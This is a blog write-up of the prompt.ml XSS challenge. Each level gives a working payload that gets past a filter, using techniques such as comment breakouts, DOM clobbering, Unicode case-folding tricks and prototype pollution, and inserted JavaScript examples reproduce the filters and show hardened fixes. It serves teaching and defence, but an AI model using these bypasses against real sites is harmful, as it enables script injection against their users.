Ajdin's blog

Prompt.ml XSS challenge write up

28 Sep 2020

Prompt.ml is an XSS challenge site inspired by alert(1) to win. Each level runs the input through a filter and drops the result into a page; the goal every time is to get prompt(1) to execute.

0x0

A simple XSS payload: the input lands inside a quoted attribute value, so close the attribute and the tag, then open an <img> whose onerror handler calls prompt(1). The quote left over from the original markup closes the handler for us.

"><img src=x onerror="prompt(1)

0x1

The filter strips anything that looks like a complete tag, so we simply never close ours. The browser is more forgiving than the filter: it still renders the <img>, and onerror fires.

<img src=x onerror="prompt(1)"

0x2

Parentheses are filtered, so prompt(1) can't be written directly. A tagged template literal calls eval.call without any parentheses in the source, and the parentheses inside the string are written as the hex escapes \x28 and \x29, which only turn into ( and ) when the string literal is evaluated, after the filter has already run.

<script>eval.call`${'prompt\x281\x29'}`</script>
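To see why the tagged template survives where a plain prompt(1) does not, here is an added example (not code from prompt.ml or from this post). It assumes the 0x2 filter deletes every "(" and "=" and then evaluates what is left; the level2Filter and runLevel2 names are mine.

```javascript
// Added example, not code from prompt.ml or from the post. Assumption about 0x2: the
// filter deletes every "(" and "=" and then evaluates whatever survives.
function level2Filter(input) {
  return input.replace(/[=(]/g, '');
}

// Stand-in for window.prompt so the result can be checked outside a browser.
const promptCalls2 = [];
globalThis.prompt = (message) => { promptCalls2.push(message); return null; };

// Runs the filtered input the way the level's <script> would: indirect eval, global scope.
function runLevel2(input) {
  promptCalls2.length = 0;
  const survived = level2Filter(input);
  try {
    (0, eval)(survived);
  } catch (e) {
    return { survived, calls: [], error: e.constructor.name };
  }
  return { survived, calls: promptCalls2.slice(), error: null };
}

// The post's payload. A tagged template calls eval.call with no "(" in the source, and
// \x28 / \x29 only become "(" and ")" when the string literal is evaluated, after the filter.
const taggedPayload = "eval.call`${'prompt\\x281\\x29'}`";

console.log(runLevel2('prompt(1)'));     // mangled to "prompt1)": SyntaxError, nothing runs
console.log(runLevel2(taggedPayload));   // untouched by the filter, prompt(1) runs
```

The tag call is eval.call(strings, 'prompt(1)'): Function.prototype.call uses the template's strings array as this (irrelevant to eval) and passes the substitution as the code to evaluate, so the whole thing reduces to an indirect eval('prompt(1)').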

0x3

The input is placed inside an HTML comment and the normal --> is blocked. The HTML parser also treats --!> as the end of a comment, so we close it that way, inject the script, and open a new comment so the --> the page appends afterwards is swallowed.

--!> <script>prompt(1);</script><!--

0x4

The level only loads a script whose URL it believes points at prompt.ml, so we need to host a .js file that calls prompt(1) somewhere else and make the check accept it. The check decodes the URL before matching the host, but the browser does not: with the %2f left encoded, prompt.ml%2f ends up in the userinfo part of the URL and the real host is ajdin.io.

https://prompt.ml%2f@ajdin.io/prompt.js

0x5

The filter removes > and anything shaped like onerror=, but the . in its regex does not match a newline, so putting the = on the next line gets the handler through. Since > is gone we can't add a new element, so the injected type=image turns the existing <input> into an image input that loads src=x and fires onerror.

"type=image src=x onerror
="prompt(1)"
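The newline trick, the narrowed regex, and the fix that actually holds, as an added example (not code from prompt.ml or from this post). It assumes the 0x5 filter is the regex /\>|on.+?=/gi applied before the input is placed in value="..."; the level5Filter, level5FilterDotAll, escapeAttr and render names are mine.

```javascript
// Added example, not code from prompt.ml or from the post. Assumption about 0x5: the
// filter replaces ">" and anything shaped like onXXX= before dropping the input into
// value="...". The "." in on.+?= never matches a newline, which is the hole the payload uses.
function level5Filter(input) {
  return input.replace(/>|on.+?=/gi, '_');
}

// Same blacklist with [\s\S] (or the s flag) so the handler may span lines: the newline
// no longer helps. It is still a blacklist, and the quote still escapes the attribute.
function level5FilterDotAll(input) {
  return input.replace(/>|on[\s\S]+?=/gi, '_');
}

// The real fix: encode the characters that can break out of an attribute value
// instead of guessing which event-handler names to block.
function escapeAttr(input) {
  const map = { '&': '&amp;', '"': '&quot;', "'": '&#39;', '<': '&lt;', '>': '&gt;' };
  return input.replace(/[&"'<>]/g, (c) => map[c]);
}

function render(filter, input) {
  return '<input value="' + filter(input) + '" type="text">';
}

// Payload from the post: the "=" of onerror= sits on the next line.
const newlinePayload = '"type=image src=x onerror\n="prompt(1)"';

console.log(render(level5Filter, newlinePayload));        // onerror survives, quote breaks out
console.log(render(level5FilterDotAll, newlinePayload));  // onerror\n= replaced, quote still breaks out
console.log(render(escapeAttr, newlinePayload));          // everything stays inside value="..."
```

Even the dot-all version leaves the attacker free to close value="..." and add attributes, so the lesson is the encoding function, not a better regex.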

0x6

The comment in the level source shows that a form action containing javascript: or data: should be rejected:

if (!/script:|data:/i.test(document.forms[0].action))

The keys of the JSON after the # become <input> elements in that form. An <input name="action"> shadows the form's action property (DOM clobbering), so the check inspects that element instead of the URL, passes, and the form is submitted to javascript:prompt(1).
javascript:prompt(1)#{"action":1}

0x7

Each #-separated segment is truncated to 12 characters and placed in its own title attribute, so no single segment can hold the payload. Spread it across three instead: the first closes the attribute and opens <svg, the second starts the onload handler with a /* comment, and the third closes the comment and calls prompt(1). The HTML between the segments ends up inside the JavaScript comment and is ignored.

"><svg/a=#"onload='/*#*/prompt(1)'

0x8

I couldn't get this one to work, but the solution is the Unicode Line Separator character (U+2028): the input is placed inside a single-line JavaScript comment, and the JavaScript parser treats U+2028 as a line terminator, so it ends the comment even though a real newline is not allowed through.
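The U+2028 behaviour can be checked outside the challenge. This is an added example, not code from prompt.ml or from this post; it assumes the 0x8 filter strips newline, carriage return, //, /* and */ and then embeds the input in a // comment. The level8Filter, level8FilterFixed and runLevel8 names are mine.

```javascript
// Added example, not code from prompt.ml or from the post. Assumption about 0x8: the
// level strips the obvious ways out of a comment (newline, carriage return, //, /*, */)
// and then embeds the input in a single-line JavaScript comment.
function level8Filter(input) {
  return input.replace(/\/\*|\*\/|\/\/|\n|\r/g, '');
}

// Hardened: U+2028 LINE SEPARATOR and U+2029 PARAGRAPH SEPARATOR are LineTerminators
// in ECMAScript and end a // comment exactly like \n does, so they must go too.
function level8FilterFixed(input) {
  return input.replace(/\/\*|\*\/|\/\/|\n|\r|\u2028|\u2029/g, '');
}

// Stand-in for window.prompt so the effect can be observed outside a browser.
const promptCalls8 = [];
globalThis.prompt = (message) => { promptCalls8.push(message); return null; };

// Builds the script the level would emit and evaluates it in global scope.
function runLevel8(filter, input) {
  promptCalls8.length = 0;
  (0, eval)('// ' + filter(input));
  return promptCalls8.slice();
}

const lineSeparatorPayload = '\u2028prompt(1)';

console.log(runLevel8(level8Filter, '\nprompt(1)'));             // newline removed: nothing runs
console.log(runLevel8(level8Filter, lineSeparatorPayload));      // U+2028 ends the comment: prompt(1) runs
console.log(runLevel8(level8FilterFixed, lineSeparatorPayload)); // fixed filter: nothing runs
```

The same two characters are why data embedded into a <script> block from JSON needs them escaped as \u2028 and \u2029 rather than emitted raw.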

0x9

The filter looks for < followed by an ASCII letter, so replacing the first i of img with the dotless ı (U+0131) slips past it; the level then upper-cases everything and ı becomes a plain I, giving <IMG. The same toUpperCase() would turn prompt(1) into PROMPT(1), which is not a function, so the handler is written as decimal character references: digits are unaffected by upper-casing and the browser decodes them back to prompt(1) when it reads the attribute.

<ımg src=x onerror=&#0000112&#0000114&#0000111&#0000109&#0000112&#0000116&#0000040&#0000049&#0000041>
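Both halves of the bypass (the case-mapping of ı and the entity-encoded handler) shown step by step, as an added example that is not code from prompt.ml or from this post. It assumes the 0x9 filter is the regex /<([a-zA-Z])/g followed by toUpperCase(); the decodeDecimalEntities helper only imitates what the HTML parser does with numeric references so the final attribute value is visible, and all function names are mine.

```javascript
// Added example, not code from prompt.ml or from the post. Assumption about 0x9: the
// filter neuters "<" followed by an ASCII letter, then upper-cases the whole input.
function level9Filter(input) {
  return input.replace(/<([a-zA-Z])/g, '<_$1').toUpperCase();
}

// Imitates the HTML parser's handling of &#NNN (the ";" is optional for numeric
// references) when it reads an attribute value, so we can see what the browser ends up with.
function decodeDecimalEntities(s) {
  return s.replace(/&#(\d+);?/g, (_, n) => String.fromCodePoint(Number(n)));
}

// Writes each character as a zero-padded decimal reference, like the post's payload.
// Digits and "&#" are untouched by toUpperCase().
function encodeDecimalEntities(s) {
  return Array.from(s, (c) => '&#' + String(c.codePointAt(0)).padStart(7, '0')).join('');
}

// Hardened: case-fold first, then match any Unicode letter instead of [a-zA-Z].
function level9FilterFixed(input) {
  return input.toUpperCase().replace(/<(\p{L})/gu, '<_$1');
}

// U+0131 LATIN SMALL LETTER DOTLESS I is not in [a-zA-Z], but 'ı'.toUpperCase() is 'I'.
const dotlessPayload = '<\u0131mg src=x onerror=' + encodeDecimalEntities('prompt(1)') + '>';

console.log(level9Filter('<img src=x onerror=prompt(1)>'));       // <_IMG SRC=X ONERROR=PROMPT(1)>
console.log(level9Filter(dotlessPayload));                         // <IMG SRC=X ONERROR=&#0000112...>
console.log(decodeDecimalEntities(level9Filter(dotlessPayload)));  // <IMG SRC=X ONERROR=prompt(1)>
console.log(level9FilterFixed(dotlessPayload));                    // <_IMG SRC=X ONERROR=&#0000112...>
```

Attribute names are case-insensitive in HTML, so ONERROR is as good as onerror; the only thing that had to survive the upper-casing was the handler body, and numeric references carry it through untouched.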

0xA

The first regex rewrites the word prompt, so we break it up with a single quote: p'rompt doesn't match. The second regex then strips single quotes, and we are left with prompt(1).

p'rompt(1)

0xB

Both "a"in(prompt(1)) and (prompt(1))in"a" execute prompt(1): the in operator lets us close the string the input sits in, call prompt(1), and join the call to the rest of the statement without needing any of the characters the level strips.

"(prompt(1))in"

0xC

Without writing a string literal, build the string "prompt(1)" one character at a time with String.fromCharCode and .concat(), which needs no quotes, no + and no comma-separated arguments, and hand the result to eval().

eval(String.fromCharCode(112).concat(String.fromCharCode(114)).concat(String.fromCharCode(111)).concat(String.fromCharCode(109)).concat(String.fromCharCode(112)).concat(String.fromCharCode(116)).concat(String.fromCharCode(40)).concat(String.fromCharCode(49)).concat(String.fromCharCode(41)))

0xD

The input is parsed as JSON and merged into a default config object by copying every key, including __proto__, so the nested object becomes the prototype of the config. The own source value " " fails the allowed-character check and is deleted, which makes config.source fall through to the prototype's value. That value is then used as the replacement string in String.prototype.replace(), where $` expands to the part of the template before the match, <img src=", so the output becomes <img src="<img src="onerror=prompt(1)>"> and the second img fires onerror.

{"source":" ","__proto__":{"source":"$`onerror=prompt(1)>"}}
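The two mechanisms in this payload, prototype pollution through a naive extend() and the $` pattern in a replacement string, reproduced side by side with a hardened version. This is an added example, not code from prompt.ml or from this post; it assumes the 0xD level copies every key of the parsed JSON into a default config, deletes source when it contains anything outside [\w:/.], and fills in <img src="{{source}}"> with String.prototype.replace. The function names and the default image URL are mine.

```javascript
// Added example, not code from prompt.ml or from the post. Assumptions about 0xD: a
// naive extend() that copies every key of the parsed JSON into a default config, an
// allow-list check that deletes a bad "source", and a template filled by replace().
function naiveExtend(target, source) {
  for (const key in source) target[key] = source[key];  // "__proto__" hits the prototype setter
  return target;
}

const DEFAULT_SOURCE = 'http://placehold.it/350x150';

function renderVulnerable(input) {
  const config = naiveExtend({ source: DEFAULT_SOURCE }, JSON.parse(input));
  if (/[^\w:\/.]/.test(config.source)) delete config.source;   // removes the own property only
  const source = String(config.source).replace(/"/g, '');       // now read from the prototype
  return '<img src="{{source}}">'.replace('{{source}}', source); // $` expands to '<img src="'
}

// Hardened: never copy __proto__/constructor/prototype, keep the config free of a
// prototype, check an own property, and pass a function to replace() so "$" is literal.
function safeExtend(target, source) {
  for (const key of Object.keys(source)) {
    if (key === '__proto__' || key === 'constructor' || key === 'prototype') continue;
    target[key] = source[key];
  }
  return target;
}

function renderHardened(input) {
  const config = safeExtend(Object.create(null), JSON.parse(input));
  const candidate = Object.prototype.hasOwnProperty.call(config, 'source') ? config.source : DEFAULT_SOURCE;
  const source = typeof candidate === 'string' && /^[\w:\/.]+$/.test(candidate) ? candidate : DEFAULT_SOURCE;
  return '<img src="{{source}}">'.replace('{{source}}', () => source);
}

// The post's payload: JSON.parse creates an own "__proto__" key, which the naive copy
// then assigns, turning the nested object into the config's prototype.
const protoPayload = '{"source":" ","__proto__":{"source":"$`onerror=prompt(1)>"}}';

console.log(renderVulnerable(protoPayload));  // <img src="<img src="onerror=prompt(1)>">
console.log(renderHardened(protoPayload));    // <img src="http://placehold.it/350x150">
```

Note that the replacement function is what neutralises $`; the own-property check is what neutralises the prototype trick. Either one alone would have stopped this particular payload, but both holes are independent and each deserves its own fix.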